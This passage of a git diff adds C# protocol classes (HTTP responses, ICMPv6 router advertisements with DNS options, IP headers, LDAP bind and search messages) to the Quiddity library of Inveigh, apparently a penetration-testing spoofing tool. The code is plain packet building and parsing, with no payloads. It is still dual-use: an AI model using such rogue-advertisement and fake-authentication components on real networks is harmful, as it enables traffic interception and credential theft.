to endorse or promote products derived from + * this software without specific prior written permission. + * + * THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" + * AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE + * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE + * DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE + * FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL + * DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR + * SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER + * CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, + * OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE + * OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE. + */ +using Quiddity.Support; +using System; +using System.Collections.Generic; +using System.IO; +using System.Linq; +using System.Text; + +namespace Quiddity.HTTP +{ + class HTTPResponse + { + public string Version { get; set; } + public string StatusCode { get; set; } + public string ReasonPhrase { get; set; } + public string Server { get; set; } + public string Date { get; set; } + public string ContentType { get; set; } + public string ContentLength { get; set; } + public string Connection { get; set; } + public string CacheControl { get; set; } + public string Allow { get; set; } + public string Public { get; set; } + public string DAV { get; set; } + public string Author { get; set; } + public string ProxyAuthenticate { get; set; } + public string WWWAuthenticate { get; set; } + public byte[] Message { get; set; } + + public byte[] GetBytes() + { + + if (!Utilities.ArrayIsNullOrEmpty(this.Message)) + { + this.ContentLength = Convert.ToString(this.Message.Length); + } + + using (MemoryStream memoryStream = new MemoryStream()) + { + PacketWriter packetWriter = new PacketWriter(memoryStream); + packetWriter.StringWrite(this.Version); + packetWriter.Write(new byte[1] { 0x20 }); + packetWriter.StringWrite(this.StatusCode); + packetWriter.Write(new byte[1] { 0x20 }); + packetWriter.StringWrite(this.ReasonPhrase); + packetWriter.Write(new byte[2] { 0x0d, 0x0a }); + + if (!String.IsNullOrEmpty(this.Connection)) + { + packetWriter.StringWrite("Connection: "); + packetWriter.StringWrite(this.Connection); + packetWriter.Write(new byte[2] { 0x0d, 0x0a }); + } + + if (!String.IsNullOrEmpty(this.Allow)) + { + packetWriter.StringWrite("Allow: "); + packetWriter.StringWrite(this.Allow); + packetWriter.Write(new byte[2] { 0x0d, 0x0a }); + } + + if (!String.IsNullOrEmpty(this.Public)) + { + packetWriter.StringWrite("Public: "); + packetWriter.StringWrite(this.Public); + packetWriter.Write(new byte[2] { 0x0d, 0x0a }); + } + + if (!String.IsNullOrEmpty(this.DAV)) + { + packetWriter.StringWrite("DAV: "); + packetWriter.StringWrite(this.DAV); + packetWriter.Write(new byte[2] { 0x0d, 0x0a }); + } + + if (!String.IsNullOrEmpty(this.Author)) + { + packetWriter.StringWrite("MS-Author-via: "); + packetWriter.StringWrite(this.Author); + packetWriter.Write(new byte[2] { 0x0d, 0x0a }); + } + + if (!String.IsNullOrEmpty(this.Server)) + { + packetWriter.StringWrite("Server: "); + packetWriter.StringWrite(this.Server); + packetWriter.Write(new byte[2] { 0x0d, 0x0a }); + } + + if (!String.IsNullOrEmpty(this.Date)) + { + packetWriter.StringWrite("Date: "); + packetWriter.StringWrite(this.Date); + packetWriter.Write(new byte[2] { 0x0d, 0x0a }); + } + + packetWriter.StringWrite("Content-Length: "); + packetWriter.StringWrite(this.ContentLength); + packetWriter.Write(new byte[2] { 0x0d, 0x0a }); + + if (!String.IsNullOrEmpty(this.ProxyAuthenticate)) + { + packetWriter.StringWrite("Proxy-Authenticate: "); + packetWriter.StringWrite(this.ProxyAuthenticate); + packetWriter.Write(new byte[2] { 0x0d, 0x0a }); + } + + if (!String.IsNullOrEmpty(this.WWWAuthenticate)) + { + packetWriter.StringWrite("WWW-Authenticate: "); + packetWriter.StringWrite(this.WWWAuthenticate); + packetWriter.Write(new byte[2] { 0x0d, 0x0a }); + } + + if (!String.IsNullOrEmpty(this.ContentType)) + { + packetWriter.StringWrite("Content-Type: "); + packetWriter.StringWrite(this.ContentType); + packetWriter.Write(new byte[2] { 0x0d, 0x0a }); + } + + packetWriter.Write(new byte[2] { 0x0d, 0x0a }); + + if (!Utilities.ArrayIsNullOrEmpty(this.Message)) + { + packetWriter.Write(this.Message); + } + + return memoryStream.ToArray(); + } + + } + + } + +} diff --git a/Inveigh/Protocols/Quiddity/Quiddity/Protocols/ICMPv6/ICMPv6RouterAdvertisement.cs b/Inveigh/Protocols/Quiddity/Quiddity/Protocols/ICMPv6/ICMPv6RouterAdvertisement.cs new file mode 100644 index 0000000..c0129bf --- /dev/null +++ b/Inveigh/Protocols/Quiddity/Quiddity/Protocols/ICMPv6/ICMPv6RouterAdvertisement.cs @@ -0,0 +1,107 @@ +/* + * BSD 3-Clause License + * + * Copyright (c) 2022, Kevin Robertson + * All rights reserved. + * + * Redistribution and use in source and binary forms, with or without + * modification, are permitted provided that the following conditions are met: + * + * 1. Redistributions of source code must retain the above copyright notice, this + * list of conditions and the following disclaimer. + * + * 2. Redistributions in binary form must reproduce the above copyright notice, + * this list of conditions and the following disclaimer in the documentation + * and/or other materials provided with the distribution. + * + * 3. Neither the name of the copyright holder nor the names of its + * contributors may be used to endorse or promote products derived from + * this software without specific prior written permission. + * + * THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" + * AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE + * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE + * DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE + * FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL + * DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR + * SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER + * CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, + * OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE + * OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE. + */ +using Quiddity.Support; +using System; +using System.Collections.Generic; +using System.IO; +using System.Linq; +using System.Text; + +namespace Quiddity.ICMPv6 +{ + class ICMPv6RouterAdvertisement + { + // https://datatracker.ietf.org/doc/html/rfc4861#section-4.2 + public byte Type { get; set; } + public byte Code { get; set; } + public ushort Checksum { get; set; } + public byte CurHopLimit { get; set; } + public bool M{ get; set; } // 1 bit + public bool O { get; set; } // 1 bit + public string Reserved { get; set; } // 6 bits + public ushort RouterLifeTime { get; set; } + public uint ReachableTime { get; set; } + public uint RetransTimer { get; set; } + public byte[] Options { get; set; } + + // custom fields + public byte Flags { get; set; } + + public ICMPv6RouterAdvertisement() + { + this.Type = 134; + this.Code = 0; + this.Checksum = 0; + this.Flags = 0; + this.RouterLifeTime = 0; + this.ReachableTime = 0; + this.RetransTimer = 0; + } + + public byte[] GetBytes() + { + + using (MemoryStream memoryStream = new MemoryStream()) + { + PacketWriter packetWriter = new PacketWriter(memoryStream); + packetWriter.Write(this.Type); + packetWriter.Write(this.Code); + packetWriter.Write(this.Checksum); + packetWriter.Write(this.CurHopLimit); + packetWriter.Write(this.Flags); + packetWriter.BigEndianWrite(this.RouterLifeTime); + packetWriter.BigEndianWrite(this.ReachableTime); + packetWriter.BigEndianWrite(this.RetransTimer); + + if (!Utilities.ArrayIsNullOrEmpty(Options)) + { + packetWriter.Write(this.Options); + } + + return memoryStream.ToArray(); + } + + } + + protected virtual void WriteFlags() + { + string flags = this.M ? "1" : "0"; + flags += this.O ? "1" : "0"; + flags += this.Reserved; + + for (int i = 0; i < 2; ++i) + { + this.Flags = Convert.ToByte(flags.Substring(8 * i, 8), 1); ; + } + } + } +} diff --git a/Inveigh/Protocols/Quiddity/Quiddity/Protocols/ICMPv6/Options/ICMPv6DNSSearchList.cs b/Inveigh/Protocols/Quiddity/Quiddity/Protocols/ICMPv6/Options/ICMPv6DNSSearchList.cs new file mode 100644 index 0000000..7eef831 --- /dev/null +++ b/Inveigh/Protocols/Quiddity/Quiddity/Protocols/ICMPv6/Options/ICMPv6DNSSearchList.cs @@ -0,0 +1,43 @@ +using System; +using System.Collections.Generic; +using System.IO; +using System.Linq; +using System.Text; + +namespace Quiddity.ICMPv6 +{ + class ICMPv6DNSSearchList + { + // https://datatracker.ietf.org/doc/html/rfc8106 + public byte Type { get; set; } + public byte Length { get; set; } + public ushort Reserved { get; set; } + public uint Lifetime { get; set; } + public byte[] DomainNames { get; set; } + + public ICMPv6DNSSearchList() + { + this.Type = 31; + this.Length = 0; + this.Reserved = 0; + this.Lifetime = 0; + } + + public byte[] GetBytes() + { + + using (MemoryStream memoryStream = new MemoryStream()) + { + PacketWriter packetWriter = new PacketWriter(memoryStream); + packetWriter.Write(this.Type); + packetWriter.Write(this.Length); + packetWriter.Write(this.Reserved); + packetWriter.BigEndianWrite(this.Lifetime); + packetWriter.Write(this.DomainNames); + return memoryStream.ToArray(); + } + + } + + } +} diff --git a/Inveigh/Protocols/Quiddity/Quiddity/Protocols/ICMPv6/Options/ICMPv6RecursiveDNS.cs b/Inveigh/Protocols/Quiddity/Quiddity/Protocols/ICMPv6/Options/ICMPv6RecursiveDNS.cs new file mode 100644 index 0000000..42f3431 --- /dev/null +++ b/Inveigh/Protocols/Quiddity/Quiddity/Protocols/ICMPv6/Options/ICMPv6RecursiveDNS.cs @@ -0,0 +1,73 @@ +/* + * BSD 3-Clause License + * + * Copyright (c) 2022, Kevin Robertson + * All rights reserved. + * + * Redistribution and use in source and binary forms, with or without + * modification, are permitted provided that the following conditions are met: + * + * 1. Redistributions of source code must retain the above copyright notice, this + * list of conditions and the following disclaimer. + * + * 2. Redistributions in binary form must reproduce the above copyright notice, + * this list of conditions and the following disclaimer in the documentation + * and/or other materials provided with the distribution. + * + * 3. Neither the name of the copyright holder nor the names of its + * contributors may be used to endorse or promote products derived from + * this software without specific prior written permission. + * + * THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" + * AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE + * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE + * DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE + * FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL + * DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR + * SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER + * CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, + * OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE + * OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE. + */ +using System; +using System.Collections.Generic; +using System.IO; +using System.Linq; +using System.Text; + +namespace Quiddity.ICMPv6 +{ + class ICMPv6RecursiveDNS + { + // https://datatracker.ietf.org/doc/html/rfc5006#section-5.1 + public byte Type { get; set; } + public byte Length { get; set; } + public ushort Reserved { get; set; } + public uint Lifetime { get; set; } + public byte[] RecursiveDNSServers { get; set; } + + public ICMPv6RecursiveDNS() + { + this.Type = 25; + this.Length = 0; + this.Reserved = 0; + this.Lifetime = 0; + } + + public byte[] GetBytes() + { + + using (MemoryStream memoryStream = new MemoryStream()) + { + PacketWriter packetWriter = new PacketWriter(memoryStream); + packetWriter.Write(this.Type); + packetWriter.Write(this.Length); + packetWriter.Write(this.Reserved); + packetWriter.BigEndianWrite(this.Lifetime); + packetWriter.Write(this.RecursiveDNSServers); + return memoryStream.ToArray(); + } + + } + } +} diff --git a/Inveigh/Protocols/Quiddity/Quiddity/Protocols/IP/IPHeader.cs b/Inveigh/Protocols/Quiddity/Quiddity/Protocols/IP/IPHeader.cs new file mode 100644 index 0000000..9167c5f --- /dev/null +++ b/Inveigh/Protocols/Quiddity/Quiddity/Protocols/IP/IPHeader.cs @@ -0,0 +1,81 @@ +/* + * BSD 3-Clause License + * + * Copyright (c) 2022, Kevin Robertson + * All rights reserved. + * + * Redistribution and use in source and binary forms, with or without + * modification, are permitted provided that the following conditions are met: + * + * 1. Redistributions of source code must retain the above copyright notice, this + * list of conditions and the following disclaimer. + * + * 2. Redistributions in binary form must reproduce the above copyright notice, + * this list of conditions and the following disclaimer in the documentation + * and/or other materials provided with the distribution. + * + * 3. Neither the name of the copyright holder nor the names of its + * contributors may be used to endorse or promote products derived from + * this software without specific prior written permission. + * + * THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" + * AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE + * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE + * DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE + * FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL + * DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR + * SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER + * CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, + * OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE + * OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE. + */ +using System; +using System.IO; +using System.Net; + +namespace Quiddity.IP +{ + class IPHeader + { + // https://datatracker.ietf.org/doc/html/rfc791#section-3.1 + public int Version { get; set; } + public int IHL { get; set; } + public byte TypeOfService { get; set; } + public ushort TotalLength { get; set; } + public ushort Identification { get; set; } + public string Flags { get; set; } + public int FragmentOffset { get; set; } + public byte TimeToLive { get; set; } + public byte Protocol { get; set; } + public ushort HeaderChecksum { get; set; } + public IPAddress SourceAddress { get; set; } + public IPAddress DestinationAddress { get; set; } + public byte[] Options { get; set; } + public byte[] Padding { get; set; } + + public void ReadBytes(byte[] data, int position) + { + + using (MemoryStream memoryStream = new MemoryStream(data)) + { + PacketReader packetReader = new PacketReader(memoryStream); + memoryStream.Position = position; + string versionIHL = packetReader.ReadBinary(1); + this.Version = Convert.ToInt32(versionIHL.Substring(0, 4), 2); + this.IHL = Convert.ToInt32(versionIHL.Substring(4, 4), 2) * 4; + this.TypeOfService = packetReader.ReadByte(); + this.TotalLength = packetReader.BigEndianReadUInt16(); + this.Identification = packetReader.BigEndianReadUInt16(); + string flagsFragmentOffset = packetReader.ReadBinary(2); + this.Flags = flagsFragmentOffset.Substring(0, 3); + this.FragmentOffset = Convert.ToInt32(flagsFragmentOffset.Substring(3, 13), 2); + this.TimeToLive = packetReader.ReadByte(); + this.Protocol = packetReader.ReadByte(); + this.HeaderChecksum = packetReader.BigEndianReadUInt16(); + this.SourceAddress = new IPAddress(packetReader.ReadBytes(4)); + this.DestinationAddress = new IPAddress(packetReader.ReadBytes(4)); + } + + } + } +} diff --git a/Inveigh/Protocols/Quiddity/Quiddity/Protocols/LDAP/LDAPMessage.cs b/Inveigh/Protocols/Quiddity/Quiddity/Protocols/LDAP/LDAPMessage.cs new file mode 100644 index 0000000..5fe7613 --- /dev/null +++ b/Inveigh/Protocols/Quiddity/Quiddity/Protocols/LDAP/LDAPMessage.cs @@ -0,0 +1,182 @@ +/* + * BSD 3-Clause License + * + * Copyright (c) 2022, Kevin Robertson + * All rights reserved. + * + * Redistribution and use in source and binary forms, with or without + * modification, are permitted provided that the following conditions are met: + * + * 1. Redistributions of source code must retain the above copyright notice, this + * list of conditions and the following disclaimer. + * + * 2. Redistributions in binary form must reproduce the above copyright notice, + * this list of conditions and the following disclaimer in the documentation + * and/or other materials provided with the distribution. + * + * 3. Neither the name of the copyright holder nor the names of its + * contributors may be used to endorse or promote products derived from + * this software without specific prior written permission. + * + * THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" + * AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE + * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE + * DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE + * FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL + * DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR + * SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER + * CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, + * OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE + * OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE. + */ +using System; +using System.Collections.Generic; +using System.Linq; +using System.Text; +using System.DirectoryServices.Protocols; +using Quiddity.Support; + +namespace Quiddity.LDAP +{ + // https://datatracker.ietf.org/doc/html/rfc2251#section-4.2 + class LDAPMessage + { + public int MessageID { get; set; } + public object ProtocolOp { get; set; } + public byte[] Controls { get; set; } + + //custom + + public int Tag { get; set; } + + public byte[] Encode() + { + return BerConverter.Encode("{iX}", this.MessageID, this.ProtocolOp); + } + + public byte[] Encode(int type) + { + + switch (type) + { + + case 3: + { + LDAPBindResponse protocolOp = (LDAPBindResponse)this.ProtocolOp; + return BerConverter.Encode("{it{eooto}}", this.MessageID, 0x61, protocolOp.ResultCode, protocolOp.MatchedDN, protocolOp.DiagnosticMessage, 0x87, protocolOp.ServerSaslCreds); + } + + case 4: + { + LDAPSearchResEntry protocolOp = (LDAPSearchResEntry)this.ProtocolOp; + return BerConverter.Encode("{it{sto}}", this.MessageID, 0x64, protocolOp.ObjectDN, 0x30, protocolOp.Attributes); + } + + case 5: + { + LDAPSearchResDone protocolOp = (LDAPSearchResDone)this.ProtocolOp; + return BerConverter.Encode("{it{eoo}}", this.MessageID, 0x65, protocolOp.ResultCode, protocolOp.MatchedDN, protocolOp.ErrorMessage); + } + + } + + return null; + } + + public byte[] Encode(LDAPSearchResDone resdone) + { + return BerConverter.Encode("{it{eoo}}", this.MessageID, 0x65, resdone.ResultCode, resdone.MatchedDN, resdone.ErrorMessage); + } + + public byte[] Encode(LDAPSearchResEntry search) + { + return BerConverter.Encode("{it{stX}}", this.MessageID, 0x64, search.ObjectDN, 0x30, search.Attributes); + } + + public void Decode(byte[] data) + { + this.Tag = GetMessageType(data); + object[] message = BerConverter.Decode("{iV}", data); + this.MessageID = (int)message[0]; + this.ProtocolOp = message[1]; + } + + public static int GetLength(int index, byte[] data) + { + int length = 0; + + switch (data[index]) + { + + case 0x84: + { + index++; + byte[] valueLength = new byte[4]; + Buffer.BlockCopy(data, index, valueLength, 0, 4); + Array.Reverse(valueLength); + length = BitConverter.ToInt32(valueLength, 0); + length += 4; + } + break; + + } + + return length; + } + + public static int GetMessageType(byte[]data) + { + int type = -1; + int index = 1; + byte tag; + int valueLength = data[index++]; + + if ((valueLength & 0x80) == 0x80) + { + int length = valueLength & 0x7f; + valueLength = 0; + + for (int i = 0; i < length; i++) + { + valueLength = valueLength * 256 + data[index++]; + } + + } + else + { + index += valueLength; + } + + index++; + valueLength = data[index]; + + if ((valueLength & 0x80) == 0x80) + { + int length = valueLength & 0x7f; + valueLength = 0; + + for (int i = 0; i < length; i++) + { + valueLength = valueLength * 256 + data[index++]; + } + + } + else + { + index += valueLength; + } + + index++; + tag = data[index]; + + if ((tag & 0x60) == 0x60 || (tag & 0x40) == 0x40) + { + type = tag & 0x1f; + } + + return type; + } + + } + +} diff --git a/Inveigh/Protocols/Quiddity/Quiddity/Protocols/LDAP/ProtocolOp/LDAPBindRequest.cs b/Inveigh/Protocols/Quiddity/Quiddity/Protocols/LDAP/ProtocolOp/LDAPBindRequest.cs new file mode 100644 index 0000000..8d10047 --- /dev/null +++ b/Inveigh/Protocols/Quiddity/Quiddity/Protocols/LDAP/ProtocolOp/LDAPBindRequest.cs @@ -0,0 +1,23 @@ +using System; +using System.Collections.Generic; +using System.Linq; +using System.Text; + +namespace Quiddity.LDAP +{ + class LDAPBindRequest + { + public byte[] Version { get; set; } + public byte[] Name { get; set; } + public byte[] Authentication { get; set; } + + public void ReadBytes(byte[][] Data) + { + this.Version = (byte[])Data.GetValue(0); + this.Name = (byte[])Data.GetValue(1); + this.Authentication = (byte[])Data.GetValue(2); + } + + } + +} diff --git a/Inveigh/Protocols/Quiddity/Quiddity/Protocols/LDAP/ProtocolOp/LDAPBindResponse.cs b/Inveigh/Protocols/Quiddity/Quiddity/Protocols/LDAP/ProtocolOp/LDAPBindResponse.cs new file mode 100644 index 0000000..26720cd --- /dev/null +++ b/Inveigh/Protocols/Quiddity/Quiddity/Protocols/LDAP/ProtocolOp/LDAPBindResponse.cs @@ -0,0 +1,18 @@ +using System; +using System.Collections.Generic; +using System.Linq; +using System.Text; + +namespace Quiddity.LDAP +{ + class LDAPBindResponse : LDAPResult + { + public byte[] ServerSaslCreds { get; set; } + + public LDAPBindResponse() + { + this.ResultCode = 14; + } + + } +} diff --git a/Inveigh/Protocols/Quiddity/Quiddity/Protocols/LDAP/ProtocolOp/LDAPPartialAttributeList.cs b/Inveigh/Protocols/Quiddity/Quiddity/Protocols/LDAP/ProtocolOp/LDAPPartialAttributeList.cs new file mode 100644 index 0000000..43f565b --- /dev/null +++ b/Inveigh/Protocols/Quiddity/Quiddity/Protocols/LDAP/ProtocolOp/LDAPPartialAttributeList.cs @@ -0,0 +1,13 @@ +using System; +using System.Collections.Generic; +using System.Linq; +using System.Text; + +namespace Quiddity.LDAP +{ + class LDAPPartialAttributeList + { + public string Type { get; set; } + public string[] Vals { get; set; } + } +} diff --git a/Inveigh/Protocols/Quiddity/Quiddity/Protocols/LDAP/ProtocolOp/LDAPSearchRequest.cs b/Inveigh/Protocols/Quiddity/Quiddity/Protocols/LDAP/ProtocolOp/LDAPSearchRequest.cs new file mode 100644 index 0000000..ee697b7 --- /dev/null +++ b/Inveigh/Protocols/Quiddity/Quiddity/Protocols/LDAP/ProtocolOp/LDAPSearchRequest.cs @@ -0,0 +1,46 @@ +using Quiddity.Support; +using System; +using System.Collections.Generic; +using System.DirectoryServices.Protocols; +using System.IO; +using System.Linq; +using System.Text; + +namespace Quiddity.LDAP +{ + class LDAPSearchRequest + { + public byte[] BaseObject { get; set; } + public byte[] Scope { get; set; } + public byte[] DerefAliases { get; set; } + public byte[] SizeLimit { get; set; } + public byte[] TimeLimit { get; set; } + public byte[] TypesOnly { get; set; } + public byte[] Filter { get; set; } + public string[] Attributes { get; set; } + + public void ReadBytes(byte[][] Data) + { + this.BaseObject = (byte[])Data.GetValue(0); + this.Scope = (byte[])Data.GetValue(1); + this.DerefAliases = (byte[])Data.GetValue(2); + this.SizeLimit = (byte[])Data.GetValue(3); + this.TimeLimit = (byte[])Data.GetValue(4); + this.TypesOnly = (byte[])Data.GetValue(5); + this.Filter = (byte[])Data.GetValue(6); + this.Attributes = ASN1.DecodeOctetStringArray((byte[])Data.GetValue(7)); + } + + public object[] Decode(byte[] Data) + { + return BerConverter.Decode("{OiiiiiOO}", Data); + } + + public object[] Decode2(byte[] Data) + { + return BerConverter.Decode("{B}", Data); + } + + } + +} diff --git a/Inveigh/Protocols/Quiddity/Quiddity/Protocols/LDAP/ProtocolOp/LDAPSearchResDone.cs b/Inveigh/Protocols/Quiddity/Quiddity/Protocols/LDAP/ProtocolOp/LDAPSearchResDone.cs new file mode 100644 index 0000000..a62f9a5 --- /dev/null +++ b/Inveigh/Protocols/Quiddity/Quiddity/Protocols/LDAP/ProtocolOp/LDAPSearchResDone.cs @@ -0,0 +1,22 @@ +using System; +using System.Collections.Generic; +using System.Linq; +using System.Text; +using System.DirectoryServices.Protocols; + +namespace Quiddity.LDAP +{ + class LDAPSearchResDone + { + public int ResultCode { get; set; } + public byte[] MatchedDN { get; set; } + public byte[] ErrorMessage { get; set; } + + public byte[] Encode() + { + return BerConverter.Encode("t{eoo}", 0x65, this.ResultCode, this.MatchedDN, this.ErrorMessage); ; + } + + } + +} diff --git a/Inveigh/Protocols/Quiddity/Quiddity/Protocols/LDAP/ProtocolOp/LDAPSearchResEntry.cs b/Inveigh/Protocols/Quiddity/Quiddity/Protocols/LDAP/ProtocolOp/LDAPSearchResEntry.cs new file mode 100644 index 0000000..c1a6f1e --- /dev/null +++ b/Inveigh/Protocols/Quiddity/Quiddity/Protocols/LDAP/ProtocolOp/LDAPSearchResEntry.cs @@ -0,0 +1,25 @@ +using System; +using System.Collections.Generic; +using System.DirectoryServices.Protocols; +using System.Linq; +using System.Text; + +namespace Quiddity.LDAP +{ + class LDAPSearchResEntry + { + public string ObjectDN { get; set; } + public byte[] Attributes { get; set; } + + public byte[] Encode() + { + return BerConverter.Encode("t{stX}", new object[] { 0x64, this.ObjectDN, 0x30, this.Attributes } ); + } + + public byte[] Encode(Object[] Segment) + { + return BerConverter.Encode("t{s{V}}", 0x64, this.ObjectDN, Segment); + } + + } +} diff --git a/Inveigh/Protocols/Quiddity/Quiddity/Protocols/LDAP/Values/LDAPResult.cs b/Inveigh/Protocols/Quiddity/Quiddity/Protocols/LDAP/Values/LDAPResult.cs new file mode 100644 index 0000000..7f53dc2 --- /dev/null +++ b/Inveigh/Protocols/Quiddity/Quiddity/Protocols/LDAP/Values/LDAPResult.cs @@ -0,0 +1,46 @@ +/* + * BSD 3-Clause License + * + * Copyright (c) 2022, Kevin Robertson + * All rights reserved. + * + * Redistribution and use in source and binary forms, with or without + * modification, are permitted provided that the following conditions are met: + * + * 1. Redistributions of source code must retain the above copyright notice, this + * list of conditions and the following disclaimer. + * + * 2. Redistributions in binary form must reproduce the above copyright notice, + * this list of conditions and the following disclaimer in the documentation + * and/or other materials provided with the distribution. + * + * 3. Neither the name of the copyright holder nor the names of its + * contributors may be used to endorse or promote products derived from + * this software without specific prior written permission. + * + * THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" + * AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE + * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE + * DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE + * FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL + * DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR + * SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER + * CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, + * OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE + * OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE. + */ +using System; +using System.Collections.Generic; +using System.Linq; +using System.Text; + +namespace Quiddity.LDAP +{ + class LDAPResult + { + public int ResultCode { get; set; } + public byte[] MatchedDN { get; set; } + public byte[] DiagnosticMessage { get; set; } + + } +} diff --git a/Inveigh/Protocols/Quiddity/Quiddity/Protocols/LDAP/Values/LDAPSaslCredentials.cs b/Inveigh/Protocols/Quiddity/Quiddity/Protocols/LDAP/Values/LDAPSaslCredentials.cs new file mode 100644 index 0000000..d6d11a7 --- /dev/null +++ b/Inveigh/Protocols/Quiddity/Quiddity/Protocols/LDAP/Values/LDAPSaslCredentials.cs @@ -0,0 +1,52 @@ +/* + * BSD 3-Clause License + * + * Copyright (c) 2022, Kevin Robertson + * All rights reserved. + * + * Redistribution and use in source and binary forms, with or without + * modification, are permitted provided that the following conditions are met: + * + * 1. Redistributions of source code must retain the above copyright notice, this + * list of conditions and the following disclaimer. + * + * 2. Redistributions in binary form must reproduce the above copyright notice, + * this list of conditions and the following disclaimer in the documentation + * and/or other materials provided with the distribution. + * + * 3. Neither the name of the copyright holder nor the names of its + * contributors may be used to endorse or promote products derived from + * this software without specific prior written permission. + * + * THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" + * AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE + * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE + * DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE + * FOR ANY DIRECT, INDIRECT, INCIDENTAL, 